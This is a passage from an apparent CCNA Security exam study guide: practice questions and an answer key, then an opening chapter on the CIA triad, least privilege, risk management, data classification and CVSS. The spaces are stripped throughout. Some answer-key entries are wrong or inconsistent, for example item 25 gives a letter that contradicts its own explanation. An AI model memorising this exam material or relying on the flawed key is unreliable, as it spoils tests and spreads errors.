2. Whenasystemsadministratorisissuedbothanadministrative-levelaccountandanormaluseraccountandusestheadministrativeaccountonlywhenperforminganadministrativetask,itisanexampleofwhichconcept?
A. leastprivilege
B. splitknowledge
C. dualcontrol
D. separationofduties
3. Whatisthepurposeofmandatoryvacations?
A. crosstraining
B. fraudprevention
C. improvesmorale
D. employeeretention
4. Whichofthefollowingoccurswhenanorganizationalassetisexposedtolosses?
A. risk
B. threat
C. exposure
D. vulnerability
5. Whichofthefollowingisastandardusedbythesecurityautomationcommunitytoenumeratesoftwareflawsandconfigurationissues?
A. CSE
B. SCAP
C. CVE
D. CWE
6. Whichhackertypehacksforapoliticalcause?
A. blackhats
B. whitehats
C. scriptkiddies
D. hacktivists
7. WhichofthefollowingisanemailvalidationsystemthatworksbyusingDNStodeterminewhetheranemailsentbysomeonehasbeensentbyahostsanctionedbythatdomain’sadministrator?
A. PGP
B. S/MIME
C. SMTP
D. SPF
8. Whatdoesthefollowingcommanddo?
nmap-sP192.168.0.0-100
A. portscan
B. pingscan
C. vulnerabilityscan
D. penetrationtest
9. Youjustexecutedahalfopenscanandgotnoresponse.Whatdoesthattellyou?
A. theportisopen
B. theportisclosed
C. theportisblocked
D. itcannotbedetermined
10. Whichofthefollowingisamitigationforabufferoverflow?
A. antivirussoftware
B. IOSupdates
C. inputvalidation
D. encryption
11. WhichofthefollowingisaLayer2attack?
A. bufferoverflow
B. DoS
C. ARPpoisoning
D. IPspoofing
12. Whichofthefollowingisnotintellectualproperty?
A. designs
B. advertisements
C. recipes
D. contactlists
13. Whatisthebestcountermeasuretosocialengineering?
A. training
B. accesslists
C. HIDS
D. encryption
14. WhichofthefollowingisamitigationforARPpoisoning?
A. VLANs
B. DAI
C. DNSSec
D. STP
15. Inwhichcryptographicattackdoestheattackeruserecurringpatternstoreverseengineerthemessage?
A. sidechannel
B. frequency
C. plaintextonly
D. ciphertextonly
16. Youhavefiveusersinyourdepartment.Thesefiveusersonlyneedtoencryptinformationwithoneanother.Ifyouimplementasymmetricencryptionalgorithm,howmanykeyswillbeneededtosupportthedepartment?
A. 5
B. 8
C. 10
D. 12
17. Whichstatementistruewithregardtoasymmetricencryption?
A. lessexpensivethansymmetric
B. slowerthansymmetric
C. hardertocrackthansymmetric
D. keycompromisecanoccurmoreeasilythanwithsymmetric
18. Whichofthefollowingisastream-basedcipher?
A. RC4
B. DES
C. 3DES
D. AES
19. WhatisthepurposeofanIV?
A. doublestheencryption
B. addsrandomness
C. performs16roundsoftransposition
D. hashesthemessage
20. WhichstepisnotrequiredtoconfigureSSHonarouter?
A. Settheroutername
B. SettherouterID
C. Settherouterdomainname
D. GeneratetheRSAkey
21. Whichofthefollowingallowsyoutoassignatechniciansetsofactivitiesthatcoincidewiththeleveltheyhavebeenassigned?
A. accesslevels
B. jobparameters
C. privilegelevels
D. rules
22. Whichofthefollowingisawaytopreventunwantedchangestotheconfiguration?
A. routerlockdown
B. resilientconfiguration
C. secureIOS
D. config-sec
23. WhichofthefollowingisusedtoholdmultiplekeysusedinOSPFRoutingUpdateAuthentication?
A. keystore
B. keychain
C. keydb
D. keyauth
24. Whichofthefollowingcharacteristicsofarogueswitchcouldcauseittobecometherootbridge?
A. higherMACaddress
B. higherIPaddress
C. asuperiorBPDU
D. lowerrouterID
25. WhichofthefollowingisusedbyamaliciousindividualtopollutetheARPcacheofothermachines?
A. pingofdeath
B. bufferoverflow
C. boundviolation
D. gratuitousARP
26. WhathappenswhentheCAMtableofaswitchisfulloffakeMACaddressesandcanholdnootherMACaddresses?
A. itgetsdumped
B. theswitchshutsdown
C. theswitchstartforwardingalltrafficoutofallports
D. allportsareshutdown
27. Whichswitchfeatureusestheconceptoftrustedanduntrustedports?
A. DAI
B. DHCPsnooping
C. STP
D. RootGuard
28. Whichcommandenablesportsecurityontheswitch?
A. SW70(config-if)#switchportmodeaccess
B. SW70(config-if)#switchportport-securitymaximum2
C. SW70(config-if)#switchportport-security
D. SW70(config-if)#switchportport-securityviolationshutdown
29. Whichswitchfeaturepreventstheintroductionofarogueswitchtothetopology?
A. RootGuard
B. BPDUGuard
C. LoopGuard
D. DTP
30. Whatpreventsswitchingloops?
A. DAI
B. DHCPsnooping
C. STP
D. RootGuard
AnswerstoAssessmentTest1. A.Integrity,thesecondpartoftheCIAtriad,ensuresthatdataisprotectedfrom
unauthorizedmodificationordatacorruption.Thegoalofintegrityistopreservetheconsistencyofdata,includingdatastoredinfiles,databases,systems,andnetworks.
2. A.Theprincipleofleastprivilegerequiresthatauserorprocessisgivenonlytheminimumaccessprivilegeneededtoperformaparticulartask.
3. B.Withmandatoryvacations,allpersonnelarerequiredtotaketimeoff,allowingotherpersonneltofilltheirpositionwhilegone.Thisdetectiveadministrativecontrolenhancestheopportunitytodiscoverunusualactivity.
4. C.Anexposureoccurswhenanorganizationalassetisexposedtolosses.
5. B.SecurityContentAutomationProtocol(SCAP)isastandardusedbythesecurityautomationcommunitytoenumeratesoftwareflawsandconfigurationissues.Itstandardizedthenomenclatureandformatsused.
6. D.Hacktivistsarethosewhohacknotforpersonalgain,buttofurtheracause.Forexample,theAnonymousgrouphacksfromtimetotimeforvariouspoliticalreasons.
7. D.SenderPolicyFramework(SPF)isanemailvalidationsystemthatworksbyusingDNStodeterminewhetheranemailsentbysomeonehasbeensentbyahostsanctionedbythatdomain’sadministrator.Ifitcan’tbevalidated,itisnotdeliveredtotherecipient’sbox.
8. B.0–100istherangeofIPaddressestobescannedinthe192.168.0.0network.
9. C.Ifyoureceivenoresponsetheportisblockedonthefirewall.
10. C.Withproperinputvalidation,abufferoverflowattackwillcauseanaccessviolation.Withoutproperinputvalidation,theallocatedspacewillbeexceeded,andthedataatthebottomofthememorystackwillbeoverwritten.
11. C.Oneofthewaysaman-in-the-middleattackisaccomplishedisbypoisoningtheARPcacheonaswitch.TheattackeraccomplishesthispoisoningbyansweringARPrequestsforanothercomputer’sIPaddresswithhisownMACaddress.OncetheARPcachehasbeensuccessfullypoisoned,whenARPresolutionoccurs,bothcomputerswillhavetheattacker’sMACaddresslistedastheMACaddressthatmapstotheothercomputer’sIPaddress.Asaresult,botharesendingtotheattacker,placinghim“inthemiddle.”
12. B.Anadvertisementwouldbepubliclyavailable.
13. A.Thebestcountermeasureagainstsocialengineeringthreatsistoprovideusersecurityawarenesstraining.Thistrainingshouldberequiredandmustoccuronaregularbasisbecausesocialengineeringtechniquesevolveconstantly.
14. B.DynamicARPinspection(DAI)isasecurityfeaturethatinterceptsallARPrequestsand
responsesandcompareseachresponse’sMACaddressandIPaddressinformationagainsttheMAC–IPbindingscontainedinatrustedbindingtable.
15. B.Oneoftheissueswithsubstitutionciphersisthatifthemessageisofsufficientlength,patternsintheencryptionbegintobecomenoticeable,whichmakesitvulnerabletoafrequencyattack.Afrequencyattackiswhentheattackerusestheserecurringpatternstoreverseengineerthemessage.
16. C.Tocalculatethenumberofkeysthatwouldbeneededinthisexample,youwouldusethefollowingformula:
#ofusers×(#ofusers–1)/2
Usingourexample,youwouldcalculate5×(4)/2or10neededkeys.
17. B.Asymmetricencryptionismoreexpensivethansymmetric,itisslowerthansymmetric,itiseasiertocrackthansymmetric,andkeycompromisecanoccurlesseasilythanwithsymmetric.
18. A.OnlyRC4isastreamcipher.
19. B.Somemodesofsymmetrickeyalgorithmsuseinitializationvectors(IVs)toensurethatpatternsarenotproducedduringencryption.TheseIVsprovidethisservicebyusingrandomvalueswiththealgorithms.
20. B.ArouterIDisnotapartoftheconfiguration.
21. C.Privilegelevelsallowyoutoassignatechniciansetsofactivitiesthatcoincidewiththeleveltheyhavebeenassigned.Thereare16levelsfrom0to15.
22. B.TheIOSResilientConfigurationfeaturecanprovideawaytoeasilyrecoverfromanattackontheconfiguration,anditcanalsohelptorecoverfromanevenworseattackinwhichtheattackerdeletesnotonlythestartupconfigurationbutalsothebootimage.
23. B.Akeychaincanbeusedtoholdmultiplekeysifrequired.
24. C.WhenamaliciousindividualintroducesarogueswitchtotheswitchingnetworkandtherogueswitchhasasuperiorBPDUtotheoneheldbythecurrentrootbridge,thenewswitchassumesthepositionofrootbridge.
25. A.GratuitousARPiscalledgratuitousbecausetheARPmessagesentisananswertoaquestionthatthetargetneverasksanditcausethetargettochangeitsARPcache.
26. C.Theresultofthisattackisthattheattackerisnowabletoreceivetrafficthathewouldnothavebeenabletoseeotherwisebecauseinthisconditiontheswitchisbasicallyoperatingasahubandnotaswitch.
27. B.DHCPsnoopingisimplementedontheswitchesinthenetwork,soitisaLayer2solution.Theswitchportsontheswitcharelabeledeithertrustedoruntrusted.TrustedportsarethosethatwillallowaDHCPmessagetotraverse.
28. C.Withoutexecutingthiscommandtheothercommandswillhavenoeffect.
29. B.TheBPDUGuardfeatureisdesignedtopreventthereceptionofsuperiorBPDUsonaccessportsbypreventingthereceptionofanyBPDUframesonaccessports.
30. SpanningTreeProtocol(STP),preventsswitchingloopsinredundantswitchingnetworks.
Chapter1UnderstandingSecurityFundamentalsCISCOCCNASECURITYEXAMOBJECTIVESCOVEREDINTHISCHAPTER:
1.1Commonsecurityprinciples
Describeconfidentiality,integrity,availability(CIA)
Identifycommonsecurityterms
Identifycommonnetworksecurityzones
1.4Describenetworktopologies
Campusareanetwork(CAN)
Cloud,wideareanetwork(WAN)
Datacenter
Smalloffice/homeoffice(SOHO)
Networksecurityforavirtualenvironment
Securinganetworkisnoeasytask.Dailyyouprobablyhearaboutdatadisclosuresandnewnetworkattacks.However,youarenotdefenseless.ByproperlyimplementingthesecurityfeaturesavailableinCiscorouters,switches,andfirewalls,youcanreducetheriskofasecuritybreachtoamanageablelevel.Thisbookisdesignedtohelpyouunderstandtheissues,identifyyoursecurityoptions,anddeploythoseoptionsinthecorrectmanner.Intheprocess,thebookwillprepareyoufortheCiscoCCNASecuritycertification,whichvalidatestheskillsandknowledgerequiredtosecureanetworkusingCiscoproducts.
Inthischapter,youwilllearnthefollowing:
Commonsecurityprinciples
Networktopologies
GoalsofSecurityWhenyou’resecuringanetwork,severalimportantsecurityprinciplesshouldguideyourefforts.Everysecuritymeasureyouimplementshouldcontributetotheachievementofoneof
threegoals.Thethreefundamentalsofsecurityareconfidentiality,integrity,andavailability(CIA),oftenreferredtoastheCIAtriad.
MostsecurityissuesresultinaviolationofatleastonefacetoftheCIAtriad.Understandingthesethreesecurityprincipleswillhelpensurethatthesecuritycontrolsandmechanismsimplementedprotectatleastoneoftheseprinciples.
EverysecuritycontrolthatisputintoplacebyanorganizationfulfillsatleastoneofthesecurityprinciplesoftheCIAtriad.Understandinghowtocircumventthesesecurityprinciplesisjustasimportantasunderstandinghowtoprovidethem.
ConfidentialityToensureconfidentiality,youmustpreventthedisclosureofdataorinformationtounauthorizedentities.Aspartofconfidentiality,thesensitivitylevelofdatamustbedeterminedbeforeputtinganyaccesscontrolsinplace.Datawithahighersensitivitylevelwillhavemoreaccesscontrolsinplacethandataatalowersensitivitylevel.Identification,authentication,andauthorizationcanbeusedtomaintaindataconfidentiality.Encryptionisanotherpopularexampleofacontrolthatprovidesconfidentiality.
IntegrityIntegrity,thesecondpartoftheCIAtriad,ensuresthatdataisprotectedfromunauthorizedmodificationordatacorruption.Thegoalofintegrityistopreservetheconsistencyofdata,includingdatastoredinfiles,databases,systems,andnetworks.
Anaccesscontrollist(ACL)isanexampleofacontrolthathelpstoprovideintegrity.Anotherexampleisthegenerationofhashvaluesthatcanbeusedtovalidatedataintegrity.
AvailabilityAvailabilitymeansensuringthatdataisaccessiblewhenandwhereitisneeded.Onlyindividualswhoneedaccesstodatashouldbeallowedaccesstothatdata.Thetwomainareaswhereavailabilityisaffectedare
Whenattacksarecarriedoutthatdisableorcrippleasystem.
Whenservicelossoccursduringandafterdisasters.Eachsystemshouldbeassessedonitscriticalitytoorganizationaloperations.Controlsareimplementedbasedoneachsystem’scriticalitylevel.
Fault-toleranttechnologies,suchasRAIDorredundantsites,areexamplesofcontrolsthathelptoimproveavailability.
GuidingPrinciplesWhenmanagingnetworksecurityandaccesstoresources,therearesomeprovenprinciplesthatshouldguideyourefforts.Theseconceptshavestoodthetestoftimebecausethey
contributetosupportingtheCIAtriad.
LeastPrivilege/Need-to-KnowTheprincipleofleastprivilegerequiresthatauserorprocessisgivenonlytheminimumaccessprivilegeneededtoperformaparticulartask.Itsmainpurposeistoensurethatusersonlyhaveaccesstotheresourcestheyneedandareauthorizedtoperformonlythetaskstheyneedtoperform.Toproperlyimplementtheleastprivilegeprinciple,organizationsmustidentifyallusers’jobsandrestrictusersonlytotheidentifiedprivileges.
Theneed-to-knowprincipleiscloselyassociatedwiththeconceptofleastprivilege.Althoughleastprivilegeseekstoreduceaccesstoaminimum,theneed-to-knowprincipleactuallydefineswhattheminimumsforeachjoborbusinessfunctionare.Excessiveprivilegesbecomeaproblemwhenauserhasmorerights,privileges,andpermissionsthanheneedstodohisjob.Excessiveprivilegesarehardtocontrolinlargeenvironments.
Acommonimplementationoftheleastprivilegeandneed-to-knowprinciplesiswhenasystemsadministratorisissuedbothanadministrative-levelaccountandanormaluseraccount.Inmostday-to-dayfunctions,theadministratorshouldusehisnormaluseraccount.Whenthesystemsadministratorneedstoperformadministrative-leveltasks,heshouldusetheadministrative-levelaccount.Iftheadministratoruseshisadministrative-levelaccountwhileperformingroutinetasks,heriskscompromisingthesecurityofthesystemanduseraccountability.
Organizationalrulesthatsupporttheprincipleofleastprivilegeincludethefollowing:
Keepthenumberofadministrativeaccountstoaminimum.
Administratorsshouldusenormaluseraccountswhenperformingroutineoperations.
Permissionsontoolsthatarelikelytobeusedbyattackersshouldbeasrestrictiveaspossible.
Tomoreeasilysupporttheleastprivilegeandneed-to-knowprinciples,usersshouldbedividedintogroupstofacilitatetheconfinementofinformationtoasinglegrouporarea.Thisprocessisreferredtoascompartmentalization.
DefaulttoNoAccessDuringtheauthorizationprocess,youshouldconfigureanorganization’saccesscontrolmechanismssothatthedefaultlevelofsecurityistodefaulttonoaccess.Thismeansthatifnothinghasbeenspecificallyallowedforauserorgroup,thentheuserorgroupwillnotbeabletoaccesstheresource.Thebestsecurityapproachistostartwithnoaccessandaddrightsbasedonauser’sneedtoknowandleastprivilegeneededtoaccomplishdailytasks.
DefenseinDepthAdefense-in-depthstrategyreferstothepracticeofusingmultiplelayersofsecuritybetweendataandtheresourcesonwhichitresidesandpossibleattackers.Thefirstlayerofagood
defense-in-depthstrategyisappropriateaccesscontrolstrategies.Accesscontrolsexistinallareasofaninformationsystems(IS)infrastructure(morecommonlyreferredtoasanITinfrastructure),butadefense-in-depthstrategygoesbeyondaccesscontrol.Italsoconsiderssoftwaredevelopmentsecurity,cryptography,andphysicalsecurity.Figure1.1showsanexampleofthedefense-in-depthconcept.
FIGURE1.1Defenseindepth
SeparationofDutiesSeparationofdutiesisapreventiveadministrativecontroltokeepinmindwhendesigninganorganization’sauthenticationandauthorizationpolicies.Separationofdutiespreventsfraudbydistributingtasksandtheirassociatedrightsandprivilegesbetweenmorethanoneuser.Ithelpstodeterfraudandcollusionbecausewhenanorganizationimplementsadequateseparationofduties,collusionbetweentwoormorepersonnelwouldberequiredtocarryoutfraudagainsttheorganization.Agoodexampleofseparationdutiesisauthorizingonepersontomanagebackupproceduresandanothertomanagerestoreprocedures.
Separationofdutiesisassociatedwithdualcontrolsandsplitknowledge.Withdualcontrols,twoormoreusersareauthorizedandrequiredtoperformcertainfunctions.Forexample,aretailestablishmentmightrequiretwomanagerstoopenthesafe.Splitknowledgeensuresthatnosingleuserhasalltheinformationtoperformaparticulartask.Anexampleofasplitcontrolisthemilitaryrequiringtwoindividualstoeachenterauniquecombinationtoauthorizemissilefiring.
Separationofdutiesensuresthatonepersonisnotcapableofcompromisingorganizationalsecurity.Anyactivitiesthatareidentifiedashighriskshouldbedividedintoindividualtasks,whichcanthenbeallocatedtodifferentpersonnelordepartments.
Let’slookatanexampleoftheviolationofseparationofduties.Anorganization’sinternalauditdepartmentinvestigatesapossiblebreachofsecurity.Oneoftheauditorsinterviewsthreeemployees.
Aclerkwhoworksintheaccountsreceivableofficeandisinchargeofenteringdataintothefinancesystem
Anadministrativeassistantwhoworksintheaccountspayableofficeandisinchargeofapprovingpurchaseorders
Thefinancedepartmentmanagerwhocanperformthefunctionsofboththeclerkandtheadministrativeassistant
Toavoidfuturesecuritybreaches,theauditorshouldsuggestthatthemanagershouldonlybeabletoreviewthedataandapprovepurchaseorders.
JobRotationFromasecurityperspective,jobrotationreferstothedetectiveadministrativecontrolwheremultipleusersaretrainedtoperformthedutiesofapositiontohelppreventfraudbyanyindividualemployee.Theideaisthatbymakingmultiplepeoplefamiliarwiththelegitimatefunctionsoftheposition,thelikelihoodincreasesthatunusualactivitiesbyanyonepersonwillbenoticed.Jobrotationisoftenusedinconjunctionwithmandatoryvacations.Beyondthesecurityaspectsofjobrotation,additionalbenefitsincludethefollowing:
Trainedbackupincaseofemergencies
Protectionagainstfraud
Cross-trainingofemployees
MandatoryVacationWithmandatoryvacations,allpersonnelarerequiredtotaketimeoff,allowingotherpersonneltofilltheirpositionswhilegone.Thisdetectiveadministrativecontrolenhancestheopportunitytodiscoverunusualactivity.
Someofthesecuritybenefitsofusingmandatoryvacationsincludehavingthereplacementemployeedothefollowing:
Runthesameapplicationsasthevacationingemployee
Performtasksinadifferentorderfromthevacationingemployee
Performthejobfromadifferentworkstationthanthevacationingemployee
Replacementemployeesshouldavoidrunningscriptsthatwerecreatedbythevacationingemployee.Areplacementemployeeshouldeitherdeveloptheirownscriptormanuallycompletethetasksinthescript.
CommonSecurityTermsTheriskmanagementprocesscannotbediscussedwithoutunderstandingsomekeytermsusedinriskmanagement.Securityprofessionalsshouldbecomefamiliarwiththefollowingtermsastheyareusedinriskmanagement:
Assetsincludeanythingthatisofvaluetotheorganization.Assetscanbephysicalsuchasbuildings,land,andcomputers,andtheycanbeintangiblesuchasdata,plans,andrecipes.
Avulnerabilityisanabsenceorweaknessofacountermeasurethatisinplace.Vulnerabilitiescanoccurinsoftware,hardware,orpersonnel.Anexampleofavulnerabilityisunrestrictedaccesstoafolderonacomputer.Mostorganizationsimplementavulnerabilityassessmenttoidentifyvulnerabilities.
Athreatisthenextlogicalprogressioninriskmanagement.Athreatoccurswhenvulnerabilityisidentifiedorexploited.AthreatwouldoccurwhenanattackeridentifiedthefolderonthecomputerthathasaninappropriateorabsentACL.
Athreatagentissomethingthatcarriesoutathreat.Continuingwiththeexample,theattackerwhotakesadvantageoftheinappropriateorabsentACListhethreatagent.Keepinmind,though,thatthreatagentscandiscoverand/orexploitvulnerabilities.Notallthreatagentswillactuallyexploitanidentifiedvulnerability.
Ariskistheprobabilitythatathreatagentwillexploitavulnerabilityandtheimpactifthethreatiscarriedout.Theriskinthevulnerabilityexamplewouldbefairlyhighifthedataresidinginthefolderisconfidential.However,ifthefoldercontainsonlypublicdata,thentheriskwouldbelow.Identifyingthepotentialimpactofariskoftenrequiressecurityprofessionalstoenlistthehelpofsubject-matterexperts.
Anexposureoccurswhenanorganizationalassetisexposedtolosses.IfthefolderwiththeinappropriateorabsentACLiscompromisedbyathreatagent,theorganizationisexposedtothepossibilityofdataexposureandloss.
Acountermeasurereducesthepotentialrisk.Countermeasuresarealsoreferredtoassafeguardsorcontrols.Threethingsmustbeconsideredwhenimplementingacountermeasure:vulnerability,threat,andrisk.Forthisexample,agoodcountermeasurewouldbetoimplementtheappropriateACLandtoencryptthedata.TheACLprotectstheintegrityofthedata,andtheencryptionprotectstheconfidentialityofthedata.
Countermeasuresorcontrolscomeinmanycategoriesandtypes.Thecategoriesandtypesofcontrolsarediscussedlaterinthischapter.
AlltheaforementionedsecurityconceptsworktogetherintherelationshipdemonstratedinFigure1.2.
FIGURE1.2Securitycycle
RiskManagementProcessTheriskmanagementprocessiscomposedofaseriesofoperationsinwhichthedatafromoneoperationfeedsthenextoperation.AccordingtoNISTSP800-30,commoninformation-gatheringtechniquesusedinriskanalysisincludeautomatedriskassessmenttools,questionnaires,interviews,andpolicydocumentreviews.Keepinmindthatmultiplesourcesshouldbeusedtodeterminetheriskstoasingleasset.NISTSP800-30identifiesthefollowingstepsintheriskmanagementprocess:
1. Identifytheassetsandtheirvalue.
2. Identifythreats.
3. Identifyvulnerabilities.
4. Determinelikelihood.
5. Identifyimpact.
6. Determineriskasacombinationoflikelihoodandimpact.
Thefollowingsectionsincludetheseprocessesandtwoadditionalonesthatrelatetotheidentificationofcountermeasuresandcost-benefitanalysis.
AssetClassificationThefirststepofanyriskassessmentistoidentifytheassetsanddeterminetheassetvalue,calledassetclassification.Assetsarebothtangibleandintangible.Tangibleassetsincludecomputers,facilities,supplies,andpersonnel.Intangibleassetsincludeintellectualproperty,data,andorganizationalreputation.Thevalueofanassetshouldbeconsideredinrespecttotheassetowner’sview.Thesixfollowingconsiderationscanbeusedtodeterminetheasset’svalue:
Valuetoowner
Workrequireddevelopingorobtainingtheasset
Coststomaintaintheasset
Damagethatwouldresultiftheassetwerelost
Costthatcompetitorswouldpayfortheasset
Penaltiesthatwouldresultiftheassetwaslost
Afterdeterminingthevalueoftheassets,youshoulddeterminethevulnerabilitiesandthreatstoeachasset.
DataAssetsDatashouldbeclassifiedbasedonitsvaluetotheorganizationanditssensitivitytodisclosure.Assigningavaluetodataallowsanorganizationtodeterminetheresourcesthatshouldbeusedtoprotectthedata.Resourcesthatareusedtoprotectdataincludepersonnelresources,monetaryresources,accesscontrolresources,andsoon.Classifyingdataallowsyoutoapplydifferentprotectivemeasures.Dataclassificationiscriticaltoallsystemstoprotecttheconfidentiality,integrity,andavailabilityofdata.
Afterdataisclassified,thedatacanbesegmentedbasedonitslevelofprotectionneeded.Theclassificationlevelsensurethatdataishandledandprotectedinthemostcost-effectivemannerpossible.Anorganizationshoulddeterminetheclassificationlevelsitusesbasedontheneedsoftheorganization.Severalcommercialbusinessandmilitaryandgovernmentinformationclassificationsarecommonlyused.
Theinformationlifecycleshouldalsobebasedontheclassificationofthedata.Organizationsarerequiredtoretaincertaininformation,particularlyfinancialdata,basedonlocal,state,orgovernmentlawsandregulations.
Inthissection,wewilldiscussthesensitivityandcriticalityofdata,commercialbusinessclassifications,militaryandgovernmentclassifications,informationlifecycle,databasemaintenance,anddataaudit.
SENSITIVITYANDCRITICALITYSensitivityisameasureofhowfreelythedatacanbehandled.Somedatarequiresspecialcareandhandling,especiallywheninappropriatehandlingcouldresultinpenalties,identitytheft,financialloss,invasionofprivacy,orunauthorizedaccessbyanindividualormanyindividuals.Somedataisalsosubjecttoregulationbystateorfederallawsandrequiresnotificationintheeventofadisclosure.
Dataisassignedalevelofsensitivitybasedonwhoshouldhaveaccesstoitandhowmuchharmwouldbedoneifitweredisclosed.Thisassignmentofsensitivityiscalleddataclassification.
Criticalityisameasureoftheimportanceofthedata.Dataconsideredsensitivemaynotnecessarilybeconsideredcritical.Assigningalevelofcriticalitytoaparticulardatasetmusttakeintoconsiderationtheanswerstoafewquestions:
Willyoubeabletorecoverthedataincaseofdisaster?
Howlongwillittaketorecoverthedata?
Whatistheeffectofthisdowntime,includinglossofpublicstanding?
Dataisconsideredessentialwhenitiscriticaltotheorganization’sbusiness.Whenessentialdataisnotavailable,evenforabriefperiodoftime,oritsintegrityisquestionable,theorganizationwillbeunabletofunction.Dataisconsideredrequiredwhenitisimportanttotheorganization,butorganizationaloperationswouldcontinueforapredeterminedperiodoftimeevenifthedataisnotavailable.Dataisnonessentialiftheorganizationisabletooperatewithoutitduringextendedperiodsoftime.
Oncethesensitivityandcriticalityofdataisunderstoodanddocumented,theorganizationshouldthenworktocreateadataclassificationsystem.Mostorganizationswilluseeitheracommercialbusinessclassificationsystemoramilitaryandgovernmentclassificationsystem.
COMMERCIALBUSINESSCLASSIFICATIONSCommercialbusinessesusuallyclassifydatausingfourmainclassificationlevels,listedfromhighestsensitivityleveltolowest:
1. Confidential
2. Private
3. Sensitive
4. Public
Datathatisconfidentialincludestradesecrets,intellectualdata,applicationprogrammingcode,andotherdatathatcouldseriouslyaffecttheorganizationifunauthorizeddisclosureoccurred.Dataatthislevelwouldbeavailableonlytopersonnelintheorganizationwhoseworkrelatestothedata’ssubject.Accesstoconfidentialdatausuallyrequiresauthorizationforeachaccess.ConfidentialdataisexemptfromdisclosureundertheFreedomofInformation
Act.Inmostcases,theonlywayforexternalentitiestohaveauthorizedaccesstoconfidentialdataisasfollows:
Aftersigningaconfidentialityagreement
Whencomplyingwithacourtorder
Aspartofagovernmentprojectorcontractprocurementagreement
Datathatisprivateincludesanyinformationrelatedtopersonnel,includinghumanresourcerecords,medicalrecords,andsalaryinformation,thatisusedonlywithintheorganization.DatathatissensitiveincludesorganizationalfinancialinformationandrequiresextrameasurestoensureitsCIAandaccuracy.Publicdataisdatathatwouldnotcauseanegativeimpactontheorganization.
MILITARYANDGOVERNMENTCLASSIFICATIONSMilitaryandgovernmentalentitiesusuallyclassifydatausingfivemainclassificationlevels,listedfromhighestsensitivityleveltolowest:
1. Topsecret
2. Secret
3. Confidential
4. Sensitivebutunclassified
5. Unclassified
Datathatistopsecretincludesweaponblueprints,technologyspecifications,spysatelliteinformation,andothermilitaryinformationthatcouldgravelydamagenationalsecurityifdisclosed.Datathatissecretincludesdeploymentplans,missileplacement,andotherinformationthatcouldseriouslydamagenationalsecurityifdisclosed.Datathatisconfidentialincludespatents,tradesecrets,andotherinformationthatcouldseriouslyaffectthegovernmentifunauthorizeddisclosureoccurred.Datathatissensitivebutunclassifiedincludesmedicalorotherpersonaldatathatmightnotcauseseriousdamagetonationalsecuritybutcouldcausecitizenstoquestionthereputationofthegovernment.MilitaryandgovernmentinformationthatdoesnotfallintoanyoftheotherfourcategoriesisconsideredunclassifiedandusuallyhastobegrantedtothepublicbasedontheFreedomofInformationAct.
OTHERCLASSIFICATIONSYSTEMSAnotherclassificationsystemcreatedbytheUnitedKingdom’sNationalInfrastructureSecurityCoordinationCentre(NISCC,nowCentreforProtectionofNationalInfrastructure)andsinceadoptedbytheISO/IECaspartoftheStandardonInformationsecuritymanagementforintersectorandinterorganizationalcommunicationsandbyCERTistheTrafficLightProtocol(TLP).Thissystemusestrafficlightcolorstoclassifyinformationassets.Table1.1showsthefourcolorsandtheirmeanings.
TABLE1.1TLPclassifications
Color MeaningRed SharedonlywithinameetingAmber SharedonlywiththoseintheorganizationwithaneedtoknowGreen SharedonlywithinacommunityWhite Norestrictionbutstillsubjecttocopyrightrules
VulnerabilityIdentificationWhenidentifyingvulnerabilities,theCommonVulnerabilityScoringSystemandtheSecurityContentAutomationProtocolarestandardsusedinthisprocess.Inthissection,you’lllearnaboutthesetwomethodsforenumeratingvulnerabilitiesinacommonformat.
SecurityContentAutomationProtocol(SCAP)isastandardusedbythesecurityautomationcommunityusedtoenumeratesoftwareflawsandconfigurationissues.Itstandardizedthenomenclatureandformatsused.AvendorofsecurityautomationproductscanobtainavalidationagainstSCAP,demonstratingthatitwillinteroperatewithotherscannersandexpressthescanresultsinastandardizedway.
UnderstandingtheoperationofSCAPrequiresanunderstandingofthecomponentsofit.
CommonConfigurationEnumeration(CCE)Theseareconfigurationbest-practicestatementsmaintainedbyNIST.
CommonPlatformEnumeration(CPE)Thesearemethodsfordescribingandclassifyingoperatingsystemsapplicationsandhardwaredevices.
CommonWeaknessEnumeration(CWE)Thesearedesignflawsinthedevelopmentofsoftwarethatcanleadtovulnerabilities.
CommonVulnerabilitiesandExposures(CVE)Thesearevulnerabilitiesinpublishedoperatingsystemsandapplicationssoftware.
TheCommonVulnerabilityScoringSystem(CVSS)isasystemofrankingvulnerabilitiesthatarediscoveredbasedonpredefinedmetrics.Thissystemensuresthatthemostcriticalvulnerabilitiescanbeeasilyidentifiedandaddressedafteravulnerabilitytestismet.Scoresareawardedonascaleof0to10,withthevalueshavingthefollowingranks:
0:Noissues
0.1to3.9:Low
4.0to6.9:Medium
7.0to8.9:High
9.0to10.0:Critical
CVSSiscomposedofthreemetricgroups.Thesemetricgroupsaredescribedasfollows:
Baseincludescharacteristicsofavulnerabilitythatareconstantovertimeanduserenvironments.
Temporalincludescharacteristicsofavulnerabilitythatchangeovertimebutnotamonguserenvironments.
Environmentalincludescharacteristicsofavulnerabilitythatarerelevantanduniquetoaparticularuser’senvironment.
Thebasemetricgroupincludesthefollowingmetrics:
Accessvector(AV)describeshowtheattackerwouldexploitthevulnerabilityandhasthreepossiblevalues.
LstandsforLocalandmeansthattheattackermusthavephysicalorlogicalaccesstotheaffectedsystem.
AstandsforAdjacentnetworkandmeansthattheattackermustbeonthelocalnetwork.
NstandsforNetworkandmeansthattheattackercancausethevulnerabilityfromanynetwork.
Accesscomplexity(AC)describesthedifficultyofexploitingthevulnerabilityandhasthreepossiblevalues.
HstandsforHighandmeansthatthevulnerabilityrequiresspecialconditionsthatarehardtofind.
MstandsforMediumandmeansthatthevulnerabilityrequiressomewhatspecialconditions.
LstandsforLowandmeansthatthevulnerabilitydoesnotrequirespecialconditions.
Authentication(Au)describestheauthenticationanattackerwouldneedtogetthroughtoexploitthevulnerabilityandhasthreepossiblevalues.
MstandsforMultipleandmeansthattheattackerwouldneedtogetthroughtwoormoreauthenticationmechanisms.
SstandsforSingleandmeansthattheattackerwouldneedtogetthroughoneauthenticationmechanism.
NstandsforNoneandmeansthatnoauthenticationmechanismsareinplacetostoptheexploitofthevulnerability.
Availability(A)describesthedisruptionthatmightoccurifthevulnerabilityisexploitedandhasthreepossiblevalues.
NstandsforNoneandmeansthatthereisnoavailabilityimpact.
PstandsforPartialandmeansthatsystemperformanceisdegraded.
CstandsforCompleteandmeansthatthesystemiscompletelyshutdown.
Confidentiality(C)describestheinformationdisclosurethatmayoccurifthevulnerabilityisexploitedandhasthreepossiblevalues.
NstandsforNoneandmeansthatthereisnoconfidentialityimpact.
